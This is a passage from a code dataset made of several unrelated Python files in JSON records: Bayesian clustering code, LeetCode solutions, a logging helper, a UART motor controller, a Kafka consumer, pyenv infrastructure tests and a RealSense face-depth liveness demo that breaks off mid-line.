function\nfrom scipy.stats import beta\n\nimport random\nimport collections\n\n\nPARAMS_DICT = {\"alpha\":1., \"beta\":1.,\"k\":10.}\nGAMMA = 1. # DP concentration param\n\nclass LanguageModel(object):\n\t\"\"\"\n\tLanguage model required for Language clusters. One for each cluster. \n\tMust have log_likelihood method which determines whether it should return the \n\tprior or posterior marginals for a single new datapoint. \n\tThis version represents a BetaBinomial model where each teacher provides 10 individual \n\tdatapoints and these are seen as exchangable. i.e. we model the sum of their 1s and Ns.\n\tThis assumption is a bit hacky, but it makes the sampling easier and it reflects the idea that\n\tall teachers within a cluster are providing i.i.d. utterances from the same language. \n\t\"\"\"\n\tdef __init__(self,datapoints=[], parameters=PARAMS_DICT):\n\t\tfor k, v in parameters.items():\n\t\t\tsetattr(self,k,v)\n\t\tif len(datapoints) != 0:\n\t\t\tself.got_data = True\n\t\t\tself.N, self.y = len(datapoints)*self.k, sum(datapoints)\n\t\telse: self.got_data = False\n\n\tdef increment_counts(self,new_datapoint):\t\t\n\t\tself.N+=10\n\t\tself.y += new_datapoint\n\n\tdef decrement_counts(self,old_datapoint):\n\t\tself.N -= 10\n\t\tself.y -= old_datapoint\n\n\tdef draw_posterior(self):\n\t\tposterior = beta(self.alpha + self.y, self.beta + self.N-self.y)\n\t\tpp_pdf = posterior.pdf(np.linspace(.0001,.9999,1000))\n\t\treturn pp_pdf\n\t\t\n\tdef log_likelihood(self,new_datapoint):\n\t\t\"Return prior/posterior predictive log likelihood, marginalising over p\"\n\n\t\t# no old data: compute prior marginal dist (evidence)\n\t\tif not self.got_data:\n\t\t\talpha, beta = self.alpha, self.beta\n\n\t\t# already assigned data: compute posterior marginal (predictive)\n\t\telse:\n\t\t\talpha, beta = self.alpha + self.y, self.beta + self.N-self.y\n\n\t\tlog_bc_coef = np.log(bc(self.k,new_datapoint))\n\t\ttop = betaln(new_datapoint+alpha,self.k-new_datapoint+beta)\n\t\tbottom = betaln(alpha,beta)\n\t\tlog_p = top-bottom+log_bc_coef\n\t\treturn log_p\n\n\n\n\nclass LanguageClusters(gibbs.Component):\n\n\tdef __init__(self, datapoints):\n\t\tsuper(LanguageClusters, self).__init__('language_clusters')\n\n\t\tself.datapoints = datapoints\n\t\tself.n = len(datapoints)\n\t\tself.cluster_assignments = np.zeros(self.n)\n\t\tself.cluster_counts = collections.defaultdict(int, {0: self.n}) \n\t\tself.models = collections.defaultdict(int, {0: LanguageModel(self.datapoints)})\n\t\tself.empty_model = LanguageModel()\n\n\t@property\n\tdef state(self):\n\t\treturn [self.cluster_assignments, self.models]\n\n\tdef add_model(self, cluster_id,datapoint):\n\t\tassert cluster_id not in self.models\n\n\t\tself.models[cluster_id] = LanguageModel([datapoint])\n\t\t\n\tdef remove_model(self, cluster_id):\n\t\tassert cluster_id in self.models\n\t\t\n\t\tdel self.models[cluster_id] \n\t\t\n\tdef remove_cluster(self, cluster_id):\n\t\tassert cluster_id in self.cluster_counts\n\t\t\n\t\tdel self.cluster_counts[cluster_id]\n\n\tdef log_posteriors_existing_clusters(self,data):\n\t\t# Calculate un-normalised posterior probs for assignment to existing clusters\n\t\texisting_clusters_ids = self.cluster_counts.keys()\n\t\texisting_counts_log = np.log(np.array(self.cluster_counts.values()))\n\t\tcluster_log_likelihoods = np.array([model.log_likelihood(data) for model in self.models.values()])\n\t\tunnormalised_existing_cluster_posterior_log_probs = existing_counts_log+cluster_log_likelihoods\n\t\treturn unnormalised_existing_cluster_posterior_log_probs\n\n\tdef log_posterior_new_cluster(self,data):\n\t\t# Calculate unnormalised log-posterior for a new cluster\n\t\treturn np.log(GAMMA) + self.empty_model.log_likelihood(data)\n\n\tdef full_log_posterior(self,data):\n\t\t#Create a proper log-posterior from improper contributions\n\t\tlog_posterior_tops_existing = self.log_posteriors_existing_clusters(data)\n\t\tlog_posterior_tops_new = self.log_posterior_new_cluster(data)\n\t\tunnormalised_posterior_log_probs = np.append(log_posterior_tops_existing,log_posterior_tops_new)\n\t\tnormalised_posterior_log_probs = unnormalised_posterior_log_probs-lse(unnormalised_posterior_log_probs)\n\t\treturn normalised_posterior_log_probs\n\n\tdef sample_cluster_posterior(self,cluster_id,datapoint):\n\t\tassert cluster_id in self.cluster_counts\n\t\tself.cluster_counts[cluster_id] -= 1\n\t\tif self.cluster_counts[cluster_id] == 0:\n\t\t\tself.remove_cluster(cluster_id)\n\t\t\tself.remove_model(cluster_id)\n\n\t\tcluster_posterior = self.full_log_posterior(datapoint)\n\t\tsampled_cluster_index = utils.log_sampler(cluster_posterior).single_sample()\n\t\t\n\t\t# Did we choose a new cluster?\n\t\texisting_clusters_ids = self.cluster_counts.keys()\n\t\tif sampled_cluster_index == len(existing_clusters_ids):\n\t\t\tbiggest_cluster_index = max(existing_clusters_ids)\n\t\t\tnew_cluster_id = biggest_cluster_index + 1\n\t\t\tself.add_model(new_cluster_id,datapoint)\n\t\telse:\n\t\t\t# Did we choose an existing cluster?\n\t\t\tnew_cluster_id = existing_clusters_ids[sampled_cluster_index]\n\t\tself.cluster_counts[new_cluster_id] += 1\n\t\treturn new_cluster_id\n\n\tdef update_clusters(self,old_cluster_index,datapoint_index):\n\t\tdatapoint = self.datapoints[datapoint_index]\n\t\tsampled_cluster = self.sample_cluster_posterior(old_cluster_index, datapoint)\n\t\tself.cluster_assignments[datapoint_index] = sampled_cluster\n\t\treturn sampled_cluster\n\n\tdef update_models(self,old_cluster_index,new_cluster_index,datapoint_index):\n\t\tdatapoint = self.datapoints[datapoint_index]\n\t\tif old_cluster_index in self.models:\n\t\t\tself.models[old_cluster_index].decrement_counts(datapoint)\n\t\tself.models[new_cluster_index].increment_counts(datapoint)\n\n\tdef sample(self,components):\n\t\tfor i in xrange(self.n-1):\n\t\t\told_cluster_index = self.cluster_assignments[i]\n\t\t\tnew_cluster_index = self.update_clusters(old_cluster_index,i)\n\t\t\tself.update_models(old_cluster_index,new_cluster_index,i)","sub_path":"src/agent_bb.py","file_name":"agent_bb.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216149567","text":"# https://www.jiuzhang.com/solutions/binary-tree-longest-consecutive-sequence#tag-highlight-lang-python\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def longestConsecutive(self, root: TreeNode) -> int:\n def _helper(root, parent, total):\n if not root:\n return total\n\n if parent and root.val == parent.val + 1:\n total += 1\n else:\n total = 1\n\n left = _helper(root.left, root, total)\n right = _helper(root.right, root, total)\n\n return max(total, max(left, right))\n\n return _helper(root, None, 0)\n","sub_path":"leetcode/lc298_Binary_Tree_Longest_Consecutive_Sequence.py","file_name":"lc298_Binary_Tree_Longest_Consecutive_Sequence.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"517166553","text":"import logging # 所以不能以logging为文件名(自己的文件命名不能和引入的模块名冲突)\n\nclass MyLog:\n '''自己写的日之类'''\n\n def my_log(self,level, msg):\n # 收集器 -----创建一个日志收集器\n my_logger = logging.getLogger('python13')\n # getLogger 是个函数,必须传一个参数,作为自己的日志收集器的名字,否则还是会用root logger\n my_logger.setLevel('DEBUG') # 给日志收集器设置level (相当于第一次过滤)\n\n # 输出格式 Formatter 是个类 规定日志输出的格式\n formatter = logging.Formatter('%(asctime)s-[%(levelname)s]-[%(lineno)d]-[日志信息]:%(message)s')\n\n # 输出渠道 -----指定输出渠道\n ch = logging.StreamHandler() # 创建一个输出到控制台的渠道\n ch.setLevel('INFO') # 给自己设置的渠道设置level (相当于第二次过滤)\n ch.setFormatter(formatter)\n\n # 输出渠道 -----输出到指定文件 文件路径 绝对路径和相对路径都可以\n fh = logging.FileHandler('huahua.log',encoding='utf-8') # 指定参数,默认a模式。有文件,追加。没文件,新建\n fh.setLevel('DEBUG')\n fh.setFormatter(formatter)\n\n # 对接 日志收集器和输出渠道进行对接\n my_logger.addHandler(ch)\n my_logger.addHandler(fh)\n\n if level == 'DEBUG':\n my_logger.debug(msg) # 用自己的日志收集器去收集(logging调用的是root级别的)\n elif level == 'INFO':\n my_logger.info(msg)\n elif level == 'WARNING':\n my_logger.warning(msg)\n elif level == 'ERROR':\n my_logger.error(msg)\n else:\n my_logger.critical(msg)\n\n # 删除收集器 ,防止信息重复输出\n my_logger.removeHandler(ch)\n my_logger.removeHandler(fh)\n\n def debug(self, msg):\n self.my_log('DEBUG', msg)\n\n def info(self, msg):\n self.my_log('INFO', msg)\n\n def warning(self, msg):\n self.my_log('WARNING', msg)\n\n def error(self, msg):\n self.my_log('ERROR', msg)\n\n def critical(self, msg):\n self.my_log('CRITICAL', msg)\n\nif __name__ == '__main__':\n my_loger = MyLog()\n my_loger.error('99999999999999999')\n my_loger.info('6666666666666666666')","sub_path":"test/zgh/unittest_test/course_0105/my_log.py","file_name":"my_log.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148280041","text":"from collections import *\nimport sys\nsys.setrecursionlimit(10**6)\n\nH, W = map(int, input().split())\nmas = []\nfor i in range(H):\n mas.append(input())\n \ncolor = []\nfor i in range(H):\n color.append([-1] * W)\n\ndef DFS(node, c_color):\n x = node[0]\n y = node[1]\n nb = [[x, y-1], [x, y+1], [x+1, y], [x-1, y]]\n deq = deque()\n for i in range(4):\n if(nb[i][0] >= 0 and nb[i][0] < H and nb[i][1] >= 0 and nb[i][1] < W):\n if(color[nb[i][0]][nb[i][1]] == -1):\n deq.append(nb[i])\n deq_ = deque()\n while(deq):\n next_node = deq.popleft()\n if(mas[next_node[0]][next_node[1]] != mas[node[0]][node[1]]):\n color[next_node[0]][next_node[1]] = c_color\n deq_.append(next_node) \n while(deq_):\n next_node = deq_.popleft()\n DFS(next_node, c_color)\n return\n \ncurrent_color = 0\nfor i in range(H):\n for j in range(W):\n if(color[i][j] >= 0):\n continue\n else:\n color[i][j] = current_color\n DFS([i, j], current_color)\n current_color += 1\n\ncolor_num = []\nfor i in range(current_color):\n color_num.append([0, 0])\nfor i in range(H):\n for j in range(W):\n if(mas[i][j] == '#'):\n color_num[color[i][j]][0] += 1\n else:\n color_num[color[i][j]][1] += 1\n\nans = 0\nfor i in range(len(color_num)):\n ans += color_num[i][0] * color_num[i][1]\nprint(ans)\n","sub_path":"Python_codes/p03157/s907360209.py","file_name":"s907360209.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239137704","text":"# Program to perform arithematic operators\n\ncontinu = 'y'\nwhile continu == 'y':\n\tnumber_1 = int(input(\"Enter a number: \"))\n\tnumber_2 = int(input(\"Enter another number: \"))\n\toperation = input(\"Enter the operation to perform 1) Addition(+) , 2) Subtraction, 3) Multiplication, 4) Division: \")\n\tif operation == '+' or '1':\n\t\tsum = number_1 + number_2\n\t\tprint(f\"The Addition of {number_1} and {number_2} is {sum}\")\n\telif operation == '-' or '2':\n\t\tdifference = number_1 - number_2\n\t\tprint(f\"The Subtraction of {number_1} and {number_2} is {difference}\")\n\telif operation == '*' or '3':\n\t\tmul = number_1*number_2\n\t\tprint(f\"The Multiplication of {number_1} and {number_2} is {mul}\")\n\telse:\n\t\tdiv = number_1 / number_2\n\t\tprint(f\"The Division of {number_1} and {number_2} is {div}\")\n\tcontinu = input(\"Do you want to continue [y/n]\")\n","sub_path":"Arithmetic_operators.py","file_name":"Arithmetic_operators.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"630017320","text":"#!/usr/bin/env python\n# coding=utf8\n\"\"\"\nhttps://leetcode.com//problems/container-with-most-water/\n\nac_rate:\t32.0%\ndifficulty:\tMedium\n\n\nGiven n non-negative integers a1, a2, ..., an, where each represents a point at coordinate (i, ai). n vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0). Find two lines, which together with x-axis forms a container, such that the container contains the most water.\nNote: You may not slant the container.\n\nShow Tags:\tArray, Two Pointers\n\"\"\"\n\n\n\nclass Solution0(object):\n def maxArea(self, height):\n \"\"\"\n Time Limit Exceeded\n\n :type height: List[int]\n :rtype: int\n \"\"\"\n max_area = 0\n size = len(height)\n for i in xrange(size):\n for j in xrange(i+1, size):\n area = (j - i) * min(height[i], height[j])\n if area > max_area:\n max_area = area\n return max_area\n\n\nclass Solution(object):\n def maxArea(self, height):\n start = 0\n end = len(height) - 1\n max_area = 0\n while start < end:\n area = (end - start) * min(height[start], height[end])\n if area > max_area:\n max_area = area\n if height[start] <= height[end]:\n start += 1\n else:\n end -= 1\n return max_area\n\n","sub_path":"leetcode/finished/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534238013","text":"#\n# author: Michal Kostrzewa\n# kostrzewa.michal@o2.pl\n#\n# Module for comms with motor controller via UART\n#\n\nimport serial, time, struct, datetime\n\nimport procComms\n\non = False\n\nuart = None\nbaudrate = 2400\noutputTimeout = 0.2 # sends msgs to uC not faster than every this period. Otherwise there are \n# problems with output (messages \"queue\" up faster than they're sent and it creates a huuuge delay \n# in motor response)\n\nlastSent = 0\nlastUpdate = 0\n\nleftVar = 0.0\nrightVar = 0.0\nleftSP = 0.0\nrightSP = 0.0\n\n# for translating -1, 1 to 0,255\nminVar = 40 # start with 40 because less doesn't move the motor\nmaxVar = 220\n\nvarThreshold = 0.01\n\n# ramp time in seconds for SP change from 0 to 1\n# note that for manual control, radio signal averaging will add additional\n# delay in response time - oh well this is good enough. \nrampTime = 1.0 \nrampRate = 1.0 / rampTime\n\n# initializes comms\ndef Init():\n\tglobal uart, on\n\n\tuart = serial.Serial(\"/dev/ttyAMA0\", baudrate)\n\n\tuart.byteize = serial.EIGHTBITS\n\tuart.parity = serial.PARITY_NONE\n\tuart.stopbits = serial.STOPBITS_TWO\n\n\tif uart.inWaiting() > 0:\n\t\tuart.flushInput()\n\tuart.timeout = 1\n\n\tlastSent = 0.0\n\tlastUpdate = 0.0\n\n\ton = True\n\n\tprocComms.PrintLog('Initialized motor control.')\n\n\n# turns motors off\ndef Stop():\n\tglobal on, leftVar, rightVar\n\t# wait for empty output and stop each motor\n\tleftVar = 0.0\n\trightVar = 0.0\n\twhile SendMsg() == 1: pass\n\ton = False\n\tprocComms.PrintLog('Stopped motor control.')\n\n\n# updates actual motor setpoints based (why? applies ramp time)\ndef Update():\n\tglobal leftVar, rightVar, lastUpdate\n\n\tcurrTime = time.time()\n\tdeltaT = currTime - lastUpdate\n\tlastUpdate = currTime\n\n\t# if processor lags or at startup, stop the change\n\tif deltaT > 1.0: deltaT = 0.0\n\n\t# ramp 'direction'\n\tleftSign = 1.0\n\tif leftVar > leftSP:\n\t\tleftSign = -1.0\n\trightSign = 1.0\n\tif rightVar > rightSP:\n\t\trightSign = -1.0\n\n\tdeltaLeft = leftSign * rampRate * deltaT\n\tdeltaRight = rightSign * rampRate * deltaT\n\n\tif leftSP == 0.0 and abs(leftVar) - abs(deltaLeft) < 0.0: \n\t\tleftVar = 0.0\n\telse:\n\t\tleftVar = leftVar + deltaLeft\n\t\tif leftSP > 0.0 and leftVar >= leftSP: leftVar = leftSP\n\t\telif leftSP < 0.0 and leftVar < leftSP: leftVar = leftSP\n\n\tif rightSP == 0.0 and abs(rightVar) - abs(deltaRight) < 0.0: \n\t\trightVar = 0.0\n\telse:\n\t\trightVar = rightVar + deltaRight\n\t\tif rightSP > 0.0 and rightVar >= rightSP: rightVar = rightSP\n\t\telif rightSP < 0.0 and rightVar < rightSP: rightVar = rightSP\n\n\tSendMsg()\n\n\n# sets setpoints for both motors\ndef SetSP(leftSetpoint, rightSetpoint):\n\tglobal leftSP, rightSP\n\n\tleftSP = leftSetpoint\n\trightSP = rightSetpoint\n\n\tif leftSP < -1.0: leftSP = -1.0\n\telif leftSP > 1.0: leftSP = 1.0\n\tif rightSP < -1.0: rightSP = -1.0\n\telif rightSP > 1.0: rightSP = 1.0\n\n\n# sends messages to uC if ready\ndef SendMsg():\n\tglobal uart, lastSent\n\n\tif not on: return 4\n\n\t# don't send a message if the last one wasn't sent out yet\n\tcurrTime = time.time()\n\tif currTime - lastSent < outputTimeout:\n\t\treturn 1\n\telse:\n\t\tlastSent = currTime\n\n\tif uart is None:\n\t\tprocComms.PrintLog('Motor control not initialized!')\n\t\treturn 3\n\n\tvars = [leftVar, rightVar]\n#\tprocComms.PrintLog((leftVar, rightVar))\n\tdummy = '00'\n\tdata = struct.pack('!B', int(dummy, 16))\n\tsync = 'FF'\n\tfor i in range(2):\n\n\t\tdata += struct.pack('!B', int(dummy, 16))\n\n\t\tif vars[i] < -1 or vars[i] > 1:\n\t\t\tprocComms.PrintLog('Motor variable value out of range.')\n\t\t\treturn 2\n\n\t\t# pretty simple message protocol, frame is 2 bytes: 0xFFXYVV\n\t\t# 0xFF - sync byte\n\t\t# X={A,B} - motor ID\n\t\t# Y={0,1,2} - 0 - forward, 1 - backward, 2 - stop\n\t\t# VV={0-255} - value\n\t\t# notes: \n\t\t# - when issuing stop, value will be ignored but MUST be sent\n\t\t# - value directly corresponds to PWM output. Motor won't respond to small \n\t\t# values so a minimal value of PWM must be specified.\n\n\t\tcmd = ''\n\t\targ = 0\n\n\t\tif i == 0:\n\t\t\tcmd = 'A'\n\t\telif i == 1:\n\t\t\tcmd = 'B'\n\n\t\tif vars[i] == 0.0:\n\t\t\tcmd += '2'\n\t\telif vars[i] > 0.0:\n\t\t\tcmd += '0'\n\t\t\targ = int(minVar + (maxVar - minVar) * vars[i])\n\t\telif vars[i] < 0.0:\n\t\t\tcmd += '1'\n\t\t\targ = int(minVar + (maxVar - minVar) * -(vars[i]))\n\t\n\t\tdata += struct.pack('!B', int(sync, 16))\n\t\tdata += struct.pack('!B', int(cmd, 16))\n\t\tdata += struct.pack('!B', arg)\n\n#\tprocComms.PrintDebug('Sent to uC: ' + data.encode(\"hex\"))\n\tuart.write(data)\n\treturn 0\n","sub_path":"motorControl.py","file_name":"motorControl.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"101452273","text":"from pykafka import KafkaClient\nimport json\n\nclient = KafkaClient(hosts=\"127.0.0.1:9092\")\ntopic = client.topics[\"twitter.ai.test\"]\nconsumer = topic.get_simple_consumer()\n\nfor message in consumer:\n if message is not None:\n tweet = json.loads(message.value)\n print(tweet[\"text\"])\n","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"246496569","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n\ns = input()\n\nnumber = ['ABC', 'DEF', 'GHI', 'JKL', 'MNO', 'PQRS', 'TUV', 'WXYZ']\n\nresult = 0\n\nfor x in s:\n for y in number:\n if x in y:\n result += number.index(y) + 3\n\nprint(result)\n","sub_path":"5622.py","file_name":"5622.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10764002","text":"# coding: utf-8\n# flake8: noqa\n\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nimport os\nimport pytest\nimport testinfra.utils.ansible_runner\n\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef assert_pip_package_version_is_installed(packages, expected_pkg_name, expected_version):\n \"\"\"Expect host.pip_package(expected_pkg_name).version == expected_version\n\n \"\"\"\n\n assert expected_pkg_name in packages, 'The PIP package `{}` is not installed'.format(expected_pkg_name)\n pkg = packages[expected_pkg_name]\n\n err_msg = 'Expected package `{}` version == `{}`, got `{}`'.format(expected_pkg_name, expected_version, pkg['version'])\n\n if expected_version:\n assert pkg['version'] == expected_version, err_msg\n\n\n@pytest.mark.parametrize(\n 'required_package, what_package_install_should_be',\n (\n pytest.param('autoconf', True),\n pytest.param('centos-release-scl', True),\n pytest.param('ctags', True),\n pytest.param('expat-devel', True),\n pytest.param('gcc', True),\n pytest.param('gcc-c++', True),\n pytest.param('gdbm-devel', True),\n pytest.param('git', True),\n pytest.param('kernel-devel', True),\n pytest.param('libffi-devel', True),\n pytest.param('libpcap-devel', True),\n pytest.param('make', True),\n pytest.param('ncurses-devel', True),\n pytest.param('patchutils', True),\n pytest.param('pkgconfig', True),\n pytest.param('openssl-devel', True),\n pytest.param('python-devel', True),\n pytest.param('readline-devel', True),\n pytest.param('sqlite-devel', True),\n pytest.param('sqlite2-devel', True),\n pytest.param('tk-devel', True),\n pytest.param('zlib-devel', True),\n pytest.param('python-setuptools', True),\n pytest.param('epel-release', True),\n pytest.param('bzip2-devel', True),\n ),\n)\ndef test_required_package_is_installed(host, required_package, what_package_install_should_be):\n package = host.package(required_package)\n\n assert package.is_installed is what_package_install_should_be\n\n\ndef test_db4_devel_is_installed_on_centos_6(host):\n if host.system_info.release.split('.')[0] != '6':\n pytest.skip('skipping test because we are not CentOS 6.x')\n\n pkg = host.package('db4-devel')\n\n assert pkg.is_installed\n\n\ndef test_db4_devel_is_installed_on_centos_7(host):\n if host.system_info.release.split('.')[0] != '7':\n pytest.skip('skipping test because we are not CentOS 7.x')\n\n pkg = host.package('libdb4-devel')\n\n assert pkg.is_installed\n\n\ndef test_pyenv_root_dir_exists(host):\n opt_pyenv = host.file('/opt/pyenv')\n\n assert opt_pyenv.exists\n assert opt_pyenv.is_directory\n assert opt_pyenv.user == 'root'\n assert opt_pyenv.group == 'root'\n\n\ndef test_etc_profile_dot_d_pyenv_dot_sh_exists(host):\n etc_profiled_pyenv_sh = host.file('/etc/profile.d/pyenv.sh')\n\n expected_content = '''export PYENV_ROOT=\"${PYENV_ROOT:-/opt/pyenv}\"\nexport PATH=\"${PYENV_ROOT}/bin:${PATH}\"\neval \"$(pyenv init -)\"\n[ -d \"${PYENV_ROOT}/plugins/pyenv-virtualenv\" ] && eval \"$(pyenv virtualenv-init -)\"\n'''\n\n assert etc_profiled_pyenv_sh.exists\n assert etc_profiled_pyenv_sh.is_file\n assert etc_profiled_pyenv_sh.user == 'root'\n assert etc_profiled_pyenv_sh.user == 'root'\n assert etc_profiled_pyenv_sh.mode== 0o0644\n assert etc_profiled_pyenv_sh.content_string.strip() == expected_content.strip()\n\n\n@pytest.mark.parametrize(\n 'version',\n (\n pytest.param('2.6.9'),\n pytest.param('2.7.15'),\n pytest.param('3.6.6'),\n ),\n)\ndef test_opt_python_version_dir_exists(host, version):\n directory = host.file('/opt/python/{version}'.format(version=version))\n\n assert directory.exists\n assert directory.is_directory\n assert directory.user == 'root'\n assert directory.group == 'root'\n assert directory.mode == 0o0755\n\n python_version_file = host.file('/opt/python/{version}/.python-version'.format(version=version))\n\n assert python_version_file.exists\n assert python_version_file.is_file\n assert python_version_file.user == 'root'\n assert python_version_file.group == 'root'\n assert python_version_file.mode== 0o0644\n\n\ndef test_python269_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/2.6.9/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pyOpenSSL', expected_version='17.5.0'),\n dict(expected_pkg_name='pip', expected_version='9.0.3'),\n dict(expected_pkg_name='ndg-httpsclient', expected_version='0.5.0'),\n dict(expected_pkg_name='pyasn1', expected_version=None),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\ndef test_python2715_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/2.7.15/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pip', expected_version='10.0.1'),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\ndef test_python366_pip_package_is_installed(host):\n packages = host.pip_package.get_packages(pip_path='/opt/pyenv/versions/3.6.6/bin/pip')\n expected_packages = (\n dict(expected_pkg_name='pip', expected_version='10.0.1'),\n dict(expected_pkg_name='invoke', expected_version=None),\n dict(expected_pkg_name='virtualenv', expected_version=None),\n dict(expected_pkg_name='virtualenvwrapper', expected_version=None),\n )\n\n for expected_pkg in expected_packages:\n assert_pip_package_version_is_installed(packages, expected_pkg['expected_pkg_name'], expected_pkg['expected_version'])\n\n\n@pytest.mark.parametrize(\n 'plugin',\n (\n pytest.param('pyenv-virtualenv'),\n ),\n)\ndef test_activated_plugins_are_installed(host, plugin):\n path = host.file('/opt/pyenv/plugins/' + plugin)\n\n assert path.exists\n assert path.is_directory\n assert path.user == 'root'\n assert path.group == 'root'\n assert path.mode == 0o0755\n","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":6887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257685018","text":"import sys\nimport argparse\nimport cv2\nimport numpy as np\n\n#Parse arguments and load additional modules\nparser = argparse.ArgumentParser(description = 'Luna SDK realsense depth demo')\ngroup = parser.add_argument_group('Required arguments')\ngroup.add_argument('--data', required = True, help = 'absolute path to Luna SDK data directory')\ngroup.add_argument('--bindPath', required = True, help = 'absolute path to Luna SDK bindings directory')\ngroup.add_argument('--rsbindPath', required = True, help = 'absolute path to realsense bindings directory')\nargs = parser.parse_args()\nprint(\"Arguments are: data: {} bindPath: {} rsbindPath: {}\".format(args.data, args.bindPath, args.rsbindPath))\n\nsys.path += (args.bindPath, args.rsbindPath)\nimport FaceEngine as fe\nimport pyrealsense2 as rs\n\nif __name__ == \"__main__\":\n\t#create Face Engine root object\n\troot = fe.createFaceEngine(args.data)\n\t#check license\n\tlicense = root.getLicense()\n\tif not root.activateLicense(license, args.data + \"/license.conf\"):\n\t\tprint(\"Failed to activate license!\")\n\t\texit(-1)\n\t\n\tdetector = root.createDetector(fe.FACE_DET_V1)\n\testimator = root.createDepthEstimator()\n\twarper = root.createWarper()\n\t\n\t# Configure streams and start the pipeline\n\tpipe = rs.pipeline()\n\tpipeProfile = pipe.start()\n\n\tdevice = pipeProfile.get_device()\n\tprint(device)\n\n\t# Since realsense depth sensors contain pixel values in hardware specific units\n\t# we have to manually convert it to milimeters for depth estimator to work properly\n\tdepthSensor = device.first_depth_sensor()\n\tdepthScale = depthSensor.get_depth_scale() * 1000\n\tprint(\"Depth scale is {}\".format(depthScale))\n\n\t#For warper to work properly, we need to align both stream viewports.\n\talign_to = rs.stream.color\n\tdepthToColorAlignment = rs.align(align_to)\n\n\t#create window\n\tcv2.namedWindow('Realsense depth example', cv2.WINDOW_AUTOSIZE)\n\t\n\t# main processing loop\n\ttry:\n\t\twhile True:\n\t\t\t# Get frameset of color and depth\n\t\t\tframes = pipe.wait_for_frames()\n\t\n\t\t\t# Align the depth frame to color frame\n\t\t\talignedFrames = depthToColorAlignment.process(frames)\n\t\n\t\t\t# Get aligned frames\n\t\t\tdepthFrame = alignedFrames.get_depth_frame()\n\t\t\trgbFrame = alignedFrames.get_color_frame()\n\n\t\t\t# Validate that both frames are valid\n\t\t\tif not depthFrame or not rgbFrame:\n\t\t\t\tcontinue\n\t\t\n\t\t\t#convert depth map to milimeters\n\t\t\tdepthFrame = np.asanyarray(depthFrame.get_data())\n\t\t\tdepthFrame = (depthFrame * depthScale).astype(np.int16)\n\t\t\t\n\t\t\trgbFrame = np.asanyarray(rgbFrame.get_data())\n\t\t\t\n\t\t\t#convert incoming frames to SDK images\n\t\t\tdepthImage = fe.Image()\n\t\t\tdepthImage.setData(depthFrame, fe.FormatType.R16)\n\n\t\t\trgbImage = fe.Image()\n\t\t\trgbImage.setData(rgbFrame, fe.FormatType.R8G8B8)\n\n\t\t\t#perform detection\n\t\t\terr, face = detector.detectOne(rgbImage, rgbImage.getRect(), fe.DetectionType(fe.dt5Landmarks))\n\n\t\t\t#prepare cv image for visualisation\n\t\t\tcvRGBImage = cv2.cvtColor(rgbFrame, cv2.COLOR_BGR2RGB)\n\n\t\t\tif(err.isError):\n\t\t\t\tprint(\"Failed to detect!\")\n\t\t\telse:\n\t\t\t\tif(face.isValid() and face.landmarks5_opt.isValid()):\t\n\t\t\t\t\t#warp depth image\n\t\t\t\t\ttransformation = warper.createTransformation(face.detection, face.landmarks5_opt.value())\n\t\t\t\t\twarpResult, warpImage = warper.warp(depthImage, transformation)\n\t\t\t\t\tif warpResult.isError:\n\t\t\t\t\t\tprint(\"Failed to warp image!\")\n\t\t\t\t\t\n\t\t\t\t\t#perform depth liveness estimation\n\t\t\t\t\terror, output = estimator.estimate(warpImage)\n\t\t\t\t\tif(error.isOk):\n\t\t\t\t\t\tcolor = (0, 255, 0) if output.isReal else (0, 0, 255)\n\t\t\t\t\t\tbox = face.detection.rect\n\t\t\t\t\t\t#draw bbox\n\t\t\t\t\t\tcv2.rectangle(cvRGBImage,\n\t\t\t\t\t\t\t(int(box.x), int(box.y)),\n\t\t\t\t\t\t\t(int(box.x + box.width), int(box.y + 